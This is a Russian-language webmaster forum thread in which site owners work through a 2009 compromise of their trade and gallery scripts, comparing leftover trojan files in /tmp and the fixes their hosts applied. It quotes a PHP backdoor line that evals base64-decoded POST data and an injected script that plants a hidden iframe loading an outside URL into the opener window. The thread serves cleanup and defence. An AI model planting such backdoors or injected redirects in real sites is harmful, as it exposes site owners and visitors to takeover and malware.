С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
 Добавлено: 09/10/09 в 16:55 |
Soft-Com: я сделал проще, удалил каталог gals  , похоже скрипт глюкал при названии папки p2.php_files, теперь он ничего не пишет и тем не менее @eval(base64_decode($_POST[qxp]));//'; появляется стабильно.
Последний раз редактировалось: MadDok (09/10/09 в 17:02), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 28.06.04
Сообщения: 221
Рейтинг: 187
|
| Добавлено: 09/10/09 в 16:59 |
на нескольких доменах на разных серверах нашел пустых юзеров. удалил, пропатчился. в variables.php ничего левого нету, flie check везде на все сказал ОК. но в /tmp на обоих серверах есть много пустых *ses.tmp
доктор, я здоров или таки поломали? поубивать все эти *ses.tmp и спать спокойно?
|
|
|
|
| |
нет судьбы
С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204
 
|
| Добавлено: 09/10/09 в 19:43 |
Почти на 90% сайтов был пустой юзер, но кроме него ничего подозрительного не нашел..
Где именно этот /tmp? В корне самого сервака?
|
|
|
|
| |
С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843
|
| Добавлено: 09/10/09 в 19:49 |
это директория в корне сервера
обычно юзеры, которые даются хостером - не имеют к ней доступа. если есть рут на сервере или свой админ - можно увидеть.
файлы в этой директории - сессии залогиненных веб-юзеров, например, вебмастеров, залогиненных в тгп-скрипт или ваши собственные в трейд-скриптах.
поэтому они появляются.
сами файлы с эксплойтом выглядят как
ses.tmp
ases.tmp
а вот те файлы, которые начинаются на ses и выглядят как ses_4534584583454.tmp - это и есть сессии залогиненных юзеров.
если их стереть - просто юзерам придется перелогиниться. в этом нет ничего критического по сути.
|
|
|
|
| |
нет судьбы
С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204
|
| Добавлено: 09/10/09 в 19:55 |
Странно, но даже под рутом не смог удалить 
ses.tmp
ases.tmp
..
В них какойто зазенденный код.
Еще есть куча в /tmp нулевого размера файлов
bses.tmp
cses.tmp
dses.tmp
...
xses.tmp
yses.tmp
это что такое?
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 09/10/09 в 22:50 |
это всё код трояна, который инклюдится при выполнении даже любого смартового скрипта - удаляй
|
|
|
|
| |
нет судьбы
С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204
|
| Добавлено: 09/10/09 в 23:29 |
не удаляются, суки...
|
|
|
|
| |
С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843
|
| Добавлено: 10/10/09 в 03:51 |
вообще это довольно дико, если под рутом они не удаляются.
у тебя точно полноценный дедик? может это джейл какой-нибудь? тогда надо пинать суппорт хостера
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 10/10/09 в 07:08 |
а можно это как-то увидеть?
|
|
|
|
| |
С нами с 28.06.04
Сообщения: 221
Рейтинг: 187
|
| Добавлено: 10/10/09 в 08:44 |
У меня тоже не удалялись под рутом. Саппорт вебазиллы сказал: "Данные файлы удалять не стоит, это является временным средством защиты от взлома"
Удалять пытался уже после того как пропатчил смарты. Мож так и должно быть...
|
|
|
|
| |
нет судьбы
С нами с 27.03.03
Сообщения: 4427
Рейтинг: 4204
|
| Добавлено: 10/10/09 в 11:45 |
fihorn! Я уверен, что у меня дедики!
Сапорт сказал примерно то же самое, что и Darkestу..
|
|
|
|
| |
С нами с 06.10.05
Сообщения: 224
Рейтинг: 186
|
| Добавлено: 10/10/09 в 21:04 |
toge nashel u sebya
|
|
|
|
| |
С нами с 09.10.07
Сообщения: 433
Рейтинг: 321
|
| Добавлено: 11/10/09 в 00:26 |
Админы могли сами создать пустые файлы, и повесить аттрибут immutable -- чтобы туда нельзя было записать код эксплойта. (У такого аттрибута приоритет выше чем у прав пользователей, хотя по идее рут должен их сносить). Или поставили на них права 000
|
|
|
|
| |
С нами с 14.06.05
Сообщения: 345
Рейтинг: 171
|
| Добавлено: 12/10/09 в 08:59 |
yo: ну что, ты какнибудь сумел исправить эту проблему?
|
|
|
|
| |
С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843
|
| Добавлено: 12/10/09 в 10:27 |
ну если вы под рутом не можете удалить файлы - то, скорее всего, нужно обратиться к суппорту хостера. если это вебазилла - то, наверное, ребята тоже участвуют в решении проблемы и знают, почему вдруг файлы стали неудаляемые.
вот Alex AWM написал же про пустые файлы и 000. это старая проверенная техника, работает.
|
|
|
|
| |
С нами с 29.02.04
Сообщения: 1118
Рейтинг: 883
|
| Добавлено: 16/01/10 в 13:02 |
| Soft-Com писал: | пока еще не разобрался, но после взлома на сервере присутвуют 2 части скрипта:
1. в /tmp/ - судя по всему скрипт редиректа посетителя на урл http://itrxx.com/fr.php
|
Кто трейдит с DonKinky и его подругой Webmiss Lizzet, проверьте трейды с ними
У них точно такой же редирект вставляется при первом клике:
| Код: | | <body oncontextmenu='return false'><script>if(window.opener&&!window.opener.closed){var ifr=window.opener.document.createElement('iframe');ifr.src='http://itrxx.com/fr.php';ifr.style.visibility='hidden';ifr.style.position='absolute';window.opener.document.body.appendChild(ifr);}</script><script>window.name='qwnew';</script><script>window.location.reload();</script><meta http-equiv='refresh' content='1'> |
То есть, на их сайтах (пример http://www.realitypictures.net/) кликаем - открывается окно с этим кодом. Оно, судя по коду, вставляет скрытый фрейм в opener - то есть в окно, которое открыло линк, то есть в сам сайт DonKinky, а затем себя перегружает (открывает галлеру/трейд). У меня нет сейчас аськи до понедельника, но если кто может, посодействуйте, чтобы они убрали это г....;-)
|
|
|
|
| |
На пенсии
С нами с 09.05.07
Сообщения: 982
Рейтинг: 411
|
| Добавлено: 08/03/10 в 10:45 |
у меня в thumbs есть странные файлы типа kgjsdkjsdjk.jpg но фишка в том что они открываются как картинки и это нормальные тумбы, но название отличается от других тумб в директории и так почти в каждой директории, это нормально?
|
|
|
|
Все пиздой накрылось :)
|
0
|
|
| |
С нами с 15.12.05
Сообщения: 287
Рейтинг: 293
|
| Добавлено: 08/03/10 в 13:20 |
нормально, названия тумб рандомом генерятся, мало ли что может получиться )
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 27/06/10 в 09:10 |
а может и повториться
|
|
|
|
| |
